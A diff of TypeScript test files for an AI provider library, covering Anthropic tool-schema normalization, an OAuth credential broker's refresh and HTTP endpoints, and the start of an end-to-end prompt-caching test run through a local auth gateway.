b/packages/ai/test/anthropic-tool-schema.test.ts index a179e17af..e52e3225f 100644 --- a/packages/ai/test/anthropic-tool-schema.test.ts +++ b/packages/ai/test/anthropic-tool-schema.test.ts @@ -1,122 +1,370 @@ import { describe, expect, it } from "bun:test"; import { normalizeAnthropicToolSchema } from "@oh-my-pi/pi-ai/providers/anthropic"; -describe("normalizeAnthropicToolSchema", () => { - it("demotes numeric range keywords on number nodes into description", () => { - const out = normalizeAnthropicToolSchema({ - type: "object", - properties: { - temperature: { - type: "number", - minimum: 0, - maximum: 1, - exclusiveMinimum: 0, - exclusiveMaximum: 1, - multipleOf: 0.1, +describe("normalizeAnthropicToolSchema — SDK whitelist", () => { + describe("number / integer nodes", () => { + it("demotes range and multipleOf keywords on number nodes", () => { + const out = normalizeAnthropicToolSchema({ + type: "object", + properties: { + temperature: { + type: "number", + minimum: 0, + maximum: 1, + exclusiveMinimum: 0, + exclusiveMaximum: 1, + multipleOf: 0.1, + }, }, - }, - }) as { properties: { temperature: Record<string, unknown> } }; - expect(out.properties.temperature).toEqual({ - type: "number", - description: "{minimum: 0, maximum: 1, exclusiveMinimum: 0, exclusiveMaximum: 1, multipleOf: 0.1}", + }) as { properties: { temperature: Record<string, unknown> } }; + expect(out.properties.temperature).toEqual({ + type: "number", + description: "{minimum: 0, maximum: 1, exclusiveMinimum: 0, exclusiveMaximum: 1, multipleOf: 0.1}", + }); + }); + + it("demotes range and multipleOf keywords on integer nodes", () => { + const out = normalizeAnthropicToolSchema({ + type: "object", + properties: { + count: { type: "integer", minimum: 0, maximum: 100, multipleOf: 1 }, + }, + }) as { properties: { count: Record<string, unknown> } }; + expect(out.properties.count).toEqual({ + type: "integer", + description: "{minimum: 0, maximum: 100, multipleOf: 1}", + }); + }); + + it("demotes numeric range keywords on union-type nodes that include number", () => { + const out = normalizeAnthropicToolSchema({ + type: "object", + properties: { + value: { type: ["number", "null"], minimum: 0, maximum: 10 }, + }, + }) as { properties: { value: Record<string, unknown> } }; + expect(out.properties.value).toEqual({ + type: ["number", "null"], + description: "{minimum: 0, maximum: 10}", + }); }); }); - it("demotes numeric range keywords on integer nodes into description", () => { - const out = normalizeAnthropicToolSchema({ - type: "object", - properties: { - count: { type: "integer", minimum: 0, maximum: 100, multipleOf: 1 }, - }, - }) as { properties: { count: Record<string, unknown> } }; - expect(out.properties.count).toEqual({ - type: "integer", - description: "{minimum: 0, maximum: 100, multipleOf: 1}", + describe("string nodes", () => { + it("demotes pattern / minLength / maxLength into description", () => { + const out = normalizeAnthropicToolSchema({ + type: "object", + properties: { + name: { type: "string", pattern: "^[a-z]+$", minLength: 1, maxLength: 32 }, + }, + }) as { properties: { name: Record<string, unknown> } }; + expect(out.properties.name).toEqual({ + type: "string", + description: '{pattern: "^[a-z]+$", minLength: 1, maxLength: 32}', + }); + }); + + it("keeps `format` only when in the supported value set", () => { + const out = normalizeAnthropicToolSchema({ + type: "object", + properties: { + email: { type: "string", format: "email" }, + weird: { type: "string", format: "color-hex" }, + }, + }) as { properties: { email: Record<string, unknown>; weird: Record<string, unknown> } }; + expect(out.properties.email).toEqual({ type: "string", format: "email" }); + expect(out.properties.weird).toEqual({ type: "string", description: '{format: "color-hex"}' }); }); }); - it("demotes numeric range keywords on union-type nodes that include number", () => { - const out = normalizeAnthropicToolSchema({ - type: "object", - properties: { - value: { type: ["number", "null"], minimum: 0, maximum: 10 }, - }, - }) as { properties: { value: Record<string, unknown> } }; - expect(out.properties.value).toEqual({ - type: ["number", "null"], - description: "{minimum: 0, maximum: 10}", + describe("array nodes", () => { + it("keeps minItems only when 0 or 1, spills otherwise; demotes maxItems / uniqueItems", () => { + const out01 = normalizeAnthropicToolSchema({ + type: "array", + items: { type: "string" }, + minItems: 1, + }) as Record<string, unknown>; + expect(out01.minItems).toBe(1); + expect(out01).not.toHaveProperty("description"); + + const out5 = normalizeAnthropicToolSchema({ + type: "array", + items: { type: "string" }, + minItems: 5, + maxItems: 10, + uniqueItems: true, + }) as Record<string, unknown>; + expect(out5).not.toHaveProperty("minItems"); + expect(out5).not.toHaveProperty("maxItems"); + expect(out5).not.toHaveProperty("uniqueItems"); + expect(out5.description).toBe("{maxItems: 10, uniqueItems: true, minItems: 5}"); + }); + + it("recurses into `items` and `prefixItems`", () => { + const out = normalizeAnthropicToolSchema({ + type: "array", + items: { type: "number", minimum: 0 }, + prefixItems: [{ type: "string", minLength: 1 }], + }) as Record<string, unknown>; + expect(out.items).toEqual({ type: "number", description: "{minimum: 0}" }); + expect(out.prefixItems).toEqual([{ type: "string", description: "{minLength: 1}" }]); }); }); - it("appends spilled keywords to an existing description with a blank line", () => { - const out = normalizeAnthropicToolSchema({ - type: "object", - properties: { - ratio: { type: "number", description: "A ratio", minimum: 0, maximum: 1 }, - }, - }) as { properties: { ratio: Record<string, unknown> } }; - expect(out.properties.ratio).toEqual({ - type: "number", - description: "A ratio\n\n{minimum: 0, maximum: 1}", + describe("object nodes", () => { + it("defaults additionalProperties to false on closed objects", () => { + const out = normalizeAnthropicToolSchema({ + type: "object", + properties: { a: { type: "string" } }, + }) as Record<string, unknown>; + expect(out.additionalProperties).toBe(false); + }); + + it("preserves explicit open-map declarations (additionalProperties: true)", () => { + const out = normalizeAnthropicToolSchema({ + type: "object", + additionalProperties: true, + properties: { a: { type: "string" } }, + }) as Record<string, unknown>; + expect(out.additionalProperties).toBe(true); + }); + + it("preserves and recurses into additionalProperties schema literals", () => { + const out = normalizeAnthropicToolSchema({ + type: "object", + additionalProperties: { type: "number", minimum: 0 }, + }) as Record<string, unknown>; + expect(out.additionalProperties).toEqual({ type: "number", description: "{minimum: 0}" }); + }); + + it("demotes patternProperties / propertyNames / minItems on objects", () => { + const out = normalizeAnthropicToolSchema({ + type: "object", + properties: { tag: { type: "string" } }, + patternProperties: { "^x-": { type: "string" } }, + propertyNames: { pattern: "^[a-z]+$" }, + minItems: 1, + }) as Record<string, unknown>; + expect(out).not.toHaveProperty("patternProperties"); + expect(out).not.toHaveProperty("propertyNames"); + expect(out).not.toHaveProperty("minItems"); + expect(typeof out.description).toBe("string"); + expect(out.description).toContain("patternProperties"); + expect(out.description).toContain("propertyNames"); + expect(out.description).toContain("minItems"); }); }); - it("preserves numeric range keywords on non-numeric nodes", () => { - const out = normalizeAnthropicToolSchema({ - type: "object", - properties: { name: { type: "string", minLength: 1 } }, - }) as { properties: { name: Record<string, unknown> } }; - expect(out.properties.name).toEqual({ type: "string", minLength: 1 }); - }); - - it("demotes universally-unsupported keywords (maxItems, patternProperties, propertyNames)", () => { - const out = normalizeAnthropicToolSchema({ - type: "object", - properties: { - tags: { type: "array", items: { type: "string" }, maxItems: 5 }, - }, - patternProperties: { "^x-": { type: "string" } }, - propertyNames: { pattern: "^[a-z]+$" }, - }) as Record<string, unknown> & { description?: string; properties: { tags: Record<string, unknown> } }; - - expect(out.properties.tags).toEqual({ - type: "array", - items: { type: "string" }, - description: "{maxItems: 5}", + describe("universal preservation", () => { + it("appends spilled keywords to an existing description with a blank line", () => { + const out = normalizeAnthropicToolSchema({ + type: "object", + properties: { + ratio: { type: "number", description: "A ratio", minimum: 0, maximum: 1 }, + }, + }) as { properties: { ratio: Record<string, unknown> } }; + expect(out.properties.ratio).toEqual({ + type: "number", + description: "A ratio\n\n{minimum: 0, maximum: 1}", + }); }); - // Object-level unsupported keys also spill into the parent's description. - expect(typeof out.description).toBe("string"); - expect(out.description).toContain("patternProperties"); - expect(out.description).toContain("propertyNames"); - expect(out).not.toHaveProperty("patternProperties"); - expect(out).not.toHaveProperty("propertyNames"); - }); - it("strips minItems from object nodes and records it in the description", () => { - const out = normalizeAnthropicToolSchema({ - type: "object", - minItems: 1, - properties: { a: { type: "string" } }, - }) as Record<string, unknown>; - expect(out).not.toHaveProperty("minItems"); - expect(out.description).toBe("{minItems: 1}"); - }); - - it("keeps minItems on array nodes when it is 0 or 1, spills otherwise", () => { - const out01 = normalizeAnthropicToolSchema({ - type: "array", - items: { type: "string" }, - minItems: 1, - }) as Record<string, unknown>; - expect(out01.minItems).toBe(1); - expect(out01).not.toHaveProperty("description"); - - const out5 = normalizeAnthropicToolSchema({ - type: "array", - items: { type: "string" }, - minItems: 5, - }) as Record<string, unknown>; - expect(out5).not.toHaveProperty("minItems"); - expect(out5.description).toBe("{minItems: 5}"); + it("preserves universal keys: $ref, $defs, anyOf, enum, const, default, title", () => { + const out = normalizeAnthropicToolSchema({ + $defs: { Color: { type: "string", enum: ["r", "g", "b"] } }, + type: "object", + title: "Sample", + properties: { + ref: { $ref: "#/$defs/Color" }, + union: { anyOf: [{ type: "string" }, { type: "number" }] }, + choice: { const: "x" }, + hint: { type: "string", default: "anon" }, + }, + }) as Record<string, unknown> & { properties: Record<string, Record<string, unknown>> }; + expect(out.title).toBe("Sample"); + expect(out.$defs).toEqual({ Color: { type: "string", enum: ["r", "g", "b"] } }); + expect(out.properties.ref).toEqual({ $ref: "#/$defs/Color" }); + expect(out.properties.union.anyOf).toEqual([{ type: "string" }, { type: "number" }]); + expect(out.properties.choice).toEqual({ const: "x" }); + expect(out.properties.hint).toEqual({ type: "string", default: "anon" }); + }); + }); +}); + +/** + * Cases mirrored from the upstream Anthropic Python SDK transform tests at + * `anthropic-sdk-python/tests/lib/_parse/test_transform.py`. We adapt assertions + * to the function name `normalizeAnthropicToolSchema` and keep the same shapes. + * + * Two deliberate divergences from the SDK (NOT bugs): + * - `default` is preserved on every node (SDK demotes it into description). + * Anthropic's API accepts `default`; preserving keeps Zod/OpenAPI fidelity. + * - `$ref` does NOT short-circuit sibling keys (SDK drops everything else). + * We keep `$defs`/`description` next to a `$ref` because callers feed us + * deref-friendly schemas where siblings carry real semantics. + * Tests below that overlap with SDK cases asserting those behaviors are + * adjusted to our contract; the divergence is called out inline. + */ +describe("normalizeAnthropicToolSchema — parity with anthropic-sdk-python transform_schema", () => { + // Mirrors: anthropic-sdk-python/tests/lib/_parse/test_transform.py::test_ref_schema + it("preserves a lone $ref node", () => { + const out = normalizeAnthropicToolSchema({ $ref: "#/components/schemas/SomeSchema" }); + expect(out).toEqual({ $ref: "#/components/schemas/SomeSchema" }); + }); + + // Mirrors: anthropic-sdk-python/tests/lib/_parse/test_transform.py::test_anyof_schema + it("recurses into anyOf variants and spills per-variant constraints", () => { + const out = normalizeAnthropicToolSchema({ + anyOf: [{ type: "string" }, { type: "integer", minimum: 1 }], + }); + expect(out).toEqual({ + anyOf: [{ type: "string" }, { type: "integer", description: "{minimum: 1}" }], + }); + }); + + // Mirrors: anthropic-sdk-python/tests/lib/_parse/test_transform.py::test_enum_schema + it("keeps enum on string nodes verbatim", () => { + const out = normalizeAnthropicToolSchema({ type: "string", enum: ["foo", "bar"] }); + expect(out).toEqual({ type: "string", enum: ["foo", "bar"] }); + }); + + // Mirrors: anthropic-sdk-python/tests/lib/_parse/test_transform.py::test_allof + it("recurses into allOf variants and defaults additionalProperties on each object branch", () => { + const out = normalizeAnthropicToolSchema({ + allOf: [ + { type: "object", properties: { name: { type: "string" } } }, + { type: "object", properties: { age: { type: "integer", minimum: 0 } } }, + ], + }); + expect(out).toEqual({ + allOf: [ + { type: "object", properties: { name: { type: "string" } }, additionalProperties: false }, + { + type: "object", + properties: { age: { type: "integer", description: "{minimum: 0}" } }, + additionalProperties: false, + }, + ], + }); + }); + + // Mirrors: anthropic-sdk-python/tests/lib/_parse/test_transform.py::test_object_schema + // Divergence: SDK spills `default` into the property description; we preserve it. + it("preserves object description / required / additionalProperties=false and spills per-property constraints", () => { + const out = normalizeAnthropicToolSchema({ + type: "object", + properties: { + name: { type: "string", default: "John" }, + age: { type: "integer", minimum: 0 }, + }, + required: ["name"], + description: "Person object", + }); + expect(out).toEqual({ + type: "object", + description: "Person object", + properties: { + name: { type: "string", default: "John" }, // SDK would emit description: "{default: John}" + age: { type: "integer", description: "{minimum: 0}" }, + }, + additionalProperties: false, + required: ["name"], + }); + }); + + // Mirrors: anthropic-sdk-python/tests/lib/_parse/test_transform.py::test_array_schema + it("spills minItems>1 into description with the SDK's two-newline preamble", () => { + const out = normalizeAnthropicToolSchema({ + type: "array", + items: { type: "string" }, + minItems: 2, + description: "A list of strings", + }); + expect(out).toEqual({ + type: "array", + description: "A list of strings\n\n{minItems: 2}", + items: { type: "string" }, + }); + }); + + // Mirrors: anthropic-sdk-python/tests/lib/_parse/test_transform.py::test_string_schema_with_format_and_default + // Divergence: SDK spills `default`; we preserve it. `format=email` is kept (allowlisted). + it("keeps an allowlisted string format alongside a preserved default", () => { + const out = normalizeAnthropicToolSchema({ + type: "string", + format: "email", + default: "user@example.com", + description: "User email", + }); + expect(out).toEqual({ + type: "string", + description: "User email", + format: "email", + default: "user@example.com", // SDK would move this into description + }); + }); + + // Mirrors: anthropic-sdk-python/tests/lib/_parse/test_transform.py::test_string_schema_without_format + it("passes a bare string node through unchanged", () => { + expect(normalizeAnthropicToolSchema({ type: "string" })).toEqual({ type: "string" }); + }); + + // Mirrors: anthropic-sdk-python/tests/lib/_parse/test_transform.py::test_integer_schema_with_min_max_exclusive + it("spills integer min/max/exclusive keywords in source order under description", () => { + const out = normalizeAnthropicToolSchema({ + type: "integer", + minimum: 1, + maximum: 10, + exclusiveMinimum: 0, + exclusiveMaximum: 20, + description: "A number", + }); + expect(out).toEqual({ + type: "integer", + description: "A number\n\n{minimum: 1, maximum: 10, exclusiveMinimum: 0, exclusiveMaximum: 20}", + }); + }); + + // Mirrors: anthropic-sdk-python/tests/lib/_parse/test_transform.py::test_boolean_schema + it("passes boolean nodes with description through unchanged", () => { + expect(normalizeAnthropicToolSchema({ type: "boolean", description: "A flag" })).toEqual({ + type: "boolean", + description: "A flag", + }); + }); + + // Mirrors: anthropic-sdk-python/tests/lib/_parse/test_transform.py::test_null_schema + it("passes a null-type node through unchanged", () => { + expect(normalizeAnthropicToolSchema({ type: "null" })).toEqual({ type: "null" }); + }); + + // Mirrors: anthropic-sdk-python/tests/lib/_parse/test_transform.py::test_original_schema_not_mutated + it("does not mutate the input schema's enumerable structure", () => { + const original: Record<string, unknown> = { + type: "object", + properties: { + name: { type: "string", default: "John" }, + age: { type: "integer", minimum: 0 }, + }, + required: ["name"], + description: "Person object", + additionalProperties: true, + }; + const snapshot = JSON.parse(JSON.stringify(original)); + normalizeAnthropicToolSchema(original); + // Round-trip via JSON so the memoization Symbol slot (non-enumerable in JSON terms) + // is excluded from comparison — that is the only field our normalizer adds. + expect(JSON.parse(JSON.stringify(original))).toEqual(snapshot); + }); + + // Cycle safety: not in the SDK suite (Python deepcopies and Pydantic resolves refs), + // but our normalizer pre-stamps to break cycles. Worth pinning as a regression test. + it("resolves self-referential schemas without infinite recursion", () => { + const node: Record<string, unknown> = { type: "object", properties: {} }; + (node.properties as Record<string, unknown>).self = node; + const out = normalizeAnthropicToolSchema(node) as Record<string, unknown>; + expect(out.type).toBe("object"); + const props = out.properties as Record<string, unknown>; + expect(props.self).toBe(out); // memoized → same reference }); }); diff --git a/packages/ai/test/auth-broker-refresher.test.ts b/packages/ai/test/auth-broker-refresher.test.ts new file mode 100644 index 000000000..52e192963 --- /dev/null +++ b/packages/ai/test/auth-broker-refresher.test.ts @@ -0,0 +1,150 @@ +import { afterEach, beforeEach, describe, expect, test, vi } from "bun:test"; +import * as fs from "node:fs/promises"; +import * as os from "node:os"; +import * as path from "node:path"; +import { AuthBrokerRefresher, AuthStorage, SqliteAuthCredentialStore } from "../src"; +import * as oauthUtils from "../src/utils/oauth"; + +const ANTHROPIC_ENV = ["ANTHROPIC_API_KEY", "ANTHROPIC_OAUTH_TOKEN"] as const; +const savedEnv: Partial<Record<(typeof ANTHROPIC_ENV)[number], string | undefined>> = {}; + +describe("AuthBrokerRefresher", () => { + let tempDir = ""; + let store: SqliteAuthCredentialStore | undefined; + let storage: AuthStorage | undefined; + + beforeEach(async () => { + for (const key of ANTHROPIC_ENV) { + savedEnv[key] = process.env[key]; + delete process.env[key]; + } + tempDir = await fs.mkdtemp(path.join(os.tmpdir(), "auth-broker-refresher-")); + store = await SqliteAuthCredentialStore.open(path.join(tempDir, "agent.db")); + }); + + afterEach(async () => { + vi.restoreAllMocks(); + storage?.close(); + store?.close(); + await fs.rm(tempDir, { recursive: true, force: true }); + for (const key of ANTHROPIC_ENV) { + if (savedEnv[key] === undefined) delete process.env[key]; + else process.env[key] = savedEnv[key]; + } + }); + + test("refreshes credentials inside the skew window", async () => { + const now = 1_700_000_000_000; + const skew = 5 * 60_000; + // Credential expires in 1 minute — well within the 5-min skew → must refresh. + store!.saveOAuth("anthropic", { + access: "old", + refresh: "old-refresh", + expires: now + 60_000, + accountId: "a", + }); + const refreshSpy = vi.spyOn(oauthUtils, "refreshOAuthToken").mockResolvedValue({ + access: "fresh", + refresh: "fresh-refresh", + expires: now + 2 * 60 * 60_000, + accountId: "a", + }); + + storage = new AuthStorage(store!); + await storage.reload(); + const refresher = new AuthBrokerRefresher({ + storage, + refreshSkewMs: skew, + now: () => now, + }); + await refresher.tick(); + + expect(refreshSpy).toHaveBeenCalledTimes(1); + const persisted = store!.getOAuth("anthropic"); + expect(persisted?.access).toBe("fresh"); + expect(persisted?.refresh).toBe("fresh-refresh"); + }); + + test("does not refresh credentials safely outside the skew window", async () => { + const now = 1_700_000_000_000; + const skew = 5 * 60_000; + store!.saveOAuth("anthropic", { + access: "ok", + refresh: "ok-refresh", + expires: now + 60 * 60_000, // 1 hour out + accountId: "a", + }); + const refreshSpy = vi.spyOn(oauthUtils, "refreshOAuthToken").mockResolvedValue({ + access: "should-not-run", + refresh: "x", + expires: now, + }); + + storage = new AuthStorage(store!); + await storage.reload(); + const refresher = new AuthBrokerRefresher({ + storage, + refreshSkewMs: skew, + now: () => now, + }); + await refresher.tick(); + + expect(refreshSpy).not.toHaveBeenCalled(); + }); + + test("disables credentials on definitive failure (invalid_grant)", async () => { + const now = 1_700_000_000_000; + store!.saveOAuth("anthropic", { + access: "old", + refresh: "old-refresh", + expires: now + 60_000, + accountId: "a", + }); + vi.spyOn(oauthUtils, "refreshOAuthToken").mockRejectedValue(new Error("invalid_grant")); + + storage = new AuthStorage(store!); + const disableEvents: string[] = []; + storage.onCredentialDisabled(event => { + disableEvents.push(event.disabledCause); + }); + await storage.reload(); + const refresher = new AuthBrokerRefresher({ + storage, + refreshSkewMs: 5 * 60_000, + now: () => now, + }); + await refresher.tick(); + + expect(disableEvents).toHaveLength(1); + expect(disableEvents[0]).toMatch(/invalid_grant/); + // The active row is now disabled; storage.exportSnapshot reflects it. + expect(storage.exportSnapshot().credentials).toHaveLength(0); + }); + + test("keeps credentials on transient failures (timeout/network)", async () => { + const now = 1_700_000_000_000; + store!.saveOAuth("anthropic", { + access: "old", + refresh: "old-refresh", + expires: now + 60_000, + accountId: "a", + }); + vi.spyOn(oauthUtils, "refreshOAuthToken").mockRejectedValue(new Error("fetch failed: ECONNREFUSED")); + + storage = new AuthStorage(store!); + const disableEvents: string[] = []; + storage.onCredentialDisabled(event => { + disableEvents.push(event.disabledCause); + }); + await storage.reload(); + const refresher = new AuthBrokerRefresher({ + storage, + refreshSkewMs: 5 * 60_000, + now: () => now, + }); + await refresher.tick(); + + expect(disableEvents).toHaveLength(0); + expect(storage.exportSnapshot().credentials).toHaveLength(1); + }); +}); diff --git a/packages/ai/test/auth-broker-wire.test.ts b/packages/ai/test/auth-broker-wire.test.ts new file mode 100644 index 000000000..78abbbf90 --- /dev/null +++ b/packages/ai/test/auth-broker-wire.test.ts @@ -0,0 +1,182 @@ +import { afterEach, beforeEach, describe, expect, test, vi } from "bun:test"; +import * as fs from "node:fs/promises"; +import * as os from "node:os"; +import * as path from "node:path"; +import { + AuthBrokerClient, + type AuthBrokerServerHandle, + AuthStorage, + REMOTE_REFRESH_SENTINEL, + SqliteAuthCredentialStore, + startAuthBroker, +} from "../src"; +import * as oauthUtils from "../src/utils/oauth"; + +const ANTHROPIC_ENV = ["ANTHROPIC_API_KEY", "ANTHROPIC_OAUTH_TOKEN"] as const; +const savedEnv: Partial<Record<(typeof ANTHROPIC_ENV)[number], string | undefined>> = {}; + +function mintOAuthCredential(suffix: string, expires: number) { + return { + type: "oauth" as const, + access: `access-${suffix}`, + refresh: `refresh-${suffix}`, + expires, + accountId: `account-${suffix}`, + email: `${suffix}@example.com`, + }; +} + +describe("auth-broker wire surface", () => { + let tempDir = ""; + let store: SqliteAuthCredentialStore | undefined; + let storage: AuthStorage | undefined; + let handle: AuthBrokerServerHandle | undefined; + let token = ""; + + beforeEach(async () => { + for (const key of ANTHROPIC_ENV) { + savedEnv[key] = process.env[key]; + delete process.env[key]; + } + tempDir = await fs.mkdtemp(path.join(os.tmpdir(), "auth-broker-wire-")); + store = await SqliteAuthCredentialStore.open(path.join(tempDir, "agent.db")); + store.saveOAuth("anthropic", mintOAuthCredential("a", Date.now() + 60_000)); + storage = new AuthStorage(store); + await storage.reload(); + token = "test-bearer"; + handle = startAuthBroker({ + storage, + bind: "127.0.0.1:0", + bearerTokens: [token], + disableRefresher: true, + }); + }); + + afterEach(async () => { + vi.restoreAllMocks(); + await handle?.close(); + storage?.close(); + store?.close(); + await fs.rm(tempDir, { recursive: true, force: true }); + for (const key of ANTHROPIC_ENV) { + if (savedEnv[key] === undefined) delete process.env[key]; + else process.env[key] = savedEnv[key]; + } + }); + + test("GET /v1/healthz returns ok without auth", async () => { + const res = await fetch(`${handle!.url}/v1/healthz`); + expect(res.status).toBe(200); + const body = (await res.json()) as { ok: boolean }; + expect(body.ok).toBe(true); + }); + + test("GET /v1/snapshot requires bearer and redacts refresh tokens", async () => { + const unauthorized = await fetch(`${handle!.url}/v1/snapshot`); + expect(unauthorized.status).toBe(401); + + const client = new AuthBrokerClient({ url: handle!.url, token }); + const snapshotResult = await client.fetchSnapshot(); + if (snapshotResult.status !== 200) throw new Error("expected snapshot"); + const snapshot = snapshotResult.snapshot; + expect(snapshot.credentials).toHaveLength(1); + const entry = snapshot.credentials[0]; + expect(entry.provider).toBe("anthropic"); + expect(entry.credential.type).toBe("oauth"); + if (entry.credential.type === "oauth") { + expect(entry.credential.access).toBe("access-a"); + // Refresh token is replaced with the wire sentinel — clients never see it. + expect(entry.credential.refresh).toBe(REMOTE_REFRESH_SENTINEL); + } + }); + + test("GET /v1/snapshot returns generation headers and 304 for unchanged long-poll", async () => { + const res = await fetch(`${handle!.url}/v1/snapshot`, { + headers: { Authorization: `Bearer ${token}` }, + }); + expect(res.status).toBe(200); + const body = (await res.json()) as { generation: number; serverNowMs: number; refresher: { enabled: boolean } }; + expect(res.headers.get("etag")).toBe(`"${body.generation}"`); + expect(res.headers.get("cache-control")).toBe("no-store"); + expect(body.generation).toBeGreaterThan(0); + expect(body.serverNowMs).toBeGreaterThan(0); + expect(body.refresher.enabled).toBe(false); + + const client = new AuthBrokerClient({ url: handle!.url, token }); + const unchanged = await client.fetchSnapshot({ ifGenerationGt: body.generation, waitMs: 10 }); + expect(unchanged.status).toBe(304); + expect(unchanged.generation).toBe(body.generation); + }); + + test("GET /v1/snapshot long-poll wakes when generation changes", async () => { + const client = new AuthBrokerClient({ url: handle!.url, token }); + const initial = await client.fetchSnapshot(); + if (initial.status !== 200) throw new Error("expected snapshot"); + + const pending = client.fetchSnapshot({ ifGenerationGt: initial.generation, waitMs: 1000 }); + setTimeout(() => { + storage!.upsertCredential("anthropic", mintOAuthCredential("b", Date.now() + 120_000)); + }, 10); + + const changed = await pending; + expect(changed.status).toBe(200); + if (changed.status !== 200) throw new Error("expected changed snapshot"); + expect(changed.generation).toBeGreaterThan(initial.generation); + expect( + changed.snapshot.credentials.some( + entry => entry.credential.type === "oauth" && entry.credential.access === "access-b", + ), + ).toBe(true); + }); + + test("POST /v1/credential/:id/refresh forces a refresh and persists the new credential", async () => { + const refreshed = { + access: "access-rotated", + refresh: "refresh-rotated", + expires: Date.now() + 120_000, + accountId: "account-a", + email: "a@example.com", + }; + vi.spyOn(oauthUtils, "refreshOAuthToken").mockResolvedValue(refreshed); + + const initialResult = await new AuthBrokerClient({ url: handle!.url, token }).fetchSnapshot(); + if (initialResult.status !== 200) throw new Error("expected snapshot"); + const id = initialResult.snapshot.credentials[0].id; + + const client = new AuthBrokerClient({ url: handle!.url, token }); + const result = await client.refreshCredential(id); + expect(result.entry.id).toBe(id); + if (result.entry.credential.type === "oauth") { + expect(result.entry.credential.access).toBe("access-rotated"); + expect(result.entry.credential.refresh).toBe(REMOTE_REFRESH_SENTINEL); + } + + // Underlying SQLite row was updated with the *real* refresh token (no sentinel). + const persisted = store!.getOAuth("anthropic"); + expect(persisted?.access).toBe("access-rotated"); + expect(persisted?.refresh).toBe("refresh-rotated"); + }); + + test("POST /v1/credential/:id/disable soft-deletes the credential and surfaces 404 thereafter", async () => { + const client = new AuthBrokerClient({ url: handle!.url, token }); + const initialResult = await client.fetchSnapshot(); + if (initialResult.status !== 200) throw new Error("expected snapshot"); + const id = initialResult.snapshot.credentials[0].id; + + const result = await client.disableCredential(id, "revoked by user"); + expect(result.ok).toBe(true); + + const afterResult = await client.fetchSnapshot(); + if (afterResult.status !== 200) throw new Error("expected snapshot"); + expect(afterResult.snapshot.credentials).toHaveLength(0); + + await expect(client.refreshCredential(id)).rejects.toThrow(); + }); + + test("Unknown route returns 404", async () => { + const res = await fetch(`${handle!.url}/v1/nope`, { + headers: { Authorization: `Bearer ${token}` }, + }); + expect(res.status).toBe(404); + }); +}); diff --git a/packages/ai/test/auth-gateway-anthropic-caching.test.ts b/packages/ai/test/auth-gateway-anthropic-caching.test.ts new file mode 100644 index 000000000..5ef393c13 --- /dev/null +++ b/packages/ai/test/auth-gateway-anthropic-caching.test.ts @@ -0,0 +1,161 @@ +/** + * E2E test: exercise an Anthropic conversation through a live auth-gateway and + * assert prompt caching round-trips. Defends against regressions where the + * gateway either strips `cache_control` markers, places them on the wrong + * block, drops them from the upstream wire, or fails to surface + * `cache_creation_input_tokens` / `cache_read_input_tokens` in the response. + * + * Skips unless a local gateway is reachable at the default `127.0.0.1:4000` + * (override via `OMP_E2E_GATEWAY_URL`) AND the bearer token file exists at + * `~/.omp/auth-gateway.token`. + * + * To run: `bun --cwd packages/ai test test/auth-gateway-anthropic-caching.test.ts` + * with the gateway live (`omp auth-gateway serve` or pm2). + */ +import { describe, expect, it } from "bun:test"; +import { AUTH_GATEWAY_E2E_URL, checkAuthGatewayE2EAvailable } from "./helpers"; + +interface AnthropicUsage { + input_tokens: number; + output_tokens: number; + cache_creation_input_tokens?: number; + cache_read_input_tokens?: number; +} + +interface AnthropicResponse { + type?: string; + stop_reason?: string; + content?: Array<{ type: string; text?: string }>; + usage: AnthropicUsage; + error?: { type: string; message: string }; +} + +const MODEL = Bun.env.OMP_E2E_ANTHROPIC_MODEL ?? "claude-sonnet-4-5"; + +const gateway = await checkAuthGatewayE2EAvailable(); + +// Build a system prompt that comfortably exceeds Anthropic's 1024-token cache +// floor for Sonnet. Using a deterministic repeated paragraph so cache keys are +// stable across runs of this test. +const SYSTEM_PARAGRAPH = ` +You are a precise assistant participating in an automated end-to-end test of +the omp auth-gateway's Anthropic prompt-caching pipeline. The same system +prompt will be reused across two turns; the gateway must place a cache +breakpoint on the final system block so that the second request hits the +ephemeral cache instead of being re-tokenized from scratch. Always respond +with extreme brevity: a single short word or phrase, never more than five +tokens. Do not add filler, do not add explanations, do not add punctuation +beyond what is strictly necessary. If asked to confirm something, respond +with "yes". If asked to deny, respond with "no". If asked to repeat your +previous reply, repeat it verbatim. Reasoning, hedging, and conversational +preamble are strictly forbidden. This block is intentionally verbose so the +caching threshold is comfortably cleared on every run; please disregard the +verbosity itself and follow the brevity rule above. +`.trim(); + +const SYSTEM_TEXT = Array.from({ length: 12 }, () => SYSTEM_PARAGRAPH).join("\n\n"); + +interface MessageBlock { + role: "user" | "assistant"; + content: string | Array<{ type: string; text?: string }>; +} + +async function callGateway(body: unknown, token: string): Promise<AnthropicResponse> { + const res = await fetch(`${AUTH_GATEWAY_E2E_URL}/v1/messages`, { + method: "POST", + headers: { + "Content-Type": "application/json", + Authorization: `Bearer ${token}`, + "anthropic-version": "2023-06-01", + }, + body: JSON.stringify(body), + }); + const text = await res.text(); + let parsed: AnthropicResponse; + try { + parsed = JSON.parse(text) as AnthropicResponse; + } catch { + throw new Error(`gateway returned non-JSON (status=${res.status}): ${text.slice(0, 200)}`); + } + if (parsed.error) { + throw new Error(`gateway error: ${parsed.error.type}: ${parsed.error.message}`); + } + return parsed; +} + +function extractAssistantText(res: AnthropicResponse): string { + const block = res.content?.find(c => c.type === "text"); + return block?.text ?? ""; +} + +describe.skipIf(!gateway.ok)("auth-gateway: anthropic prompt caching e2e", () => { + if (!gateway.ok) { + // Surface the skip reason once so a quick rerun with `-v` shows it. + console.warn(`[skip] anthropic caching e2e: ${gateway.reason}`); + return; + } + const token = gateway.token; + if (!token) throw new Error("invariant: token must be present when gateway.ok is true"); + + it("writes the system prefix to ephemeral cache on turn 1 and reads it on turn 2", async () => { + // Per-run nonce ensures we always start with a cold cache. The bytes + // before the breakpoint must be unique to this run; otherwise a + // previously-warm Anthropic cache entry hits on turn 1 and we lose the + // ability to assert "first turn writes, second turn reads" cleanly. + const nonce = `${Date.now().toString(36)}-${crypto.randomUUID()}`; + const systemTextWithNonce = `${SYSTEM_TEXT}\n\n[run-nonce: ${nonce}]`; + const system = [{ type: "text", text: systemTextWithNonce, cache_control: { type: "ephemeral" } }]; + + // ── Turn 1 ─────────────────────────────────────────────────────── + const turn1Messages: MessageBlock[] = [{ role: "user", content: "Respond with the single word: alpha" }]; + const turn1 = await callGateway( + { + model: MODEL, + max_tokens: 4, + system, + messages: turn1Messages, + }, + token, + ); + + const turn1Text = extractAssistantText(turn1); + 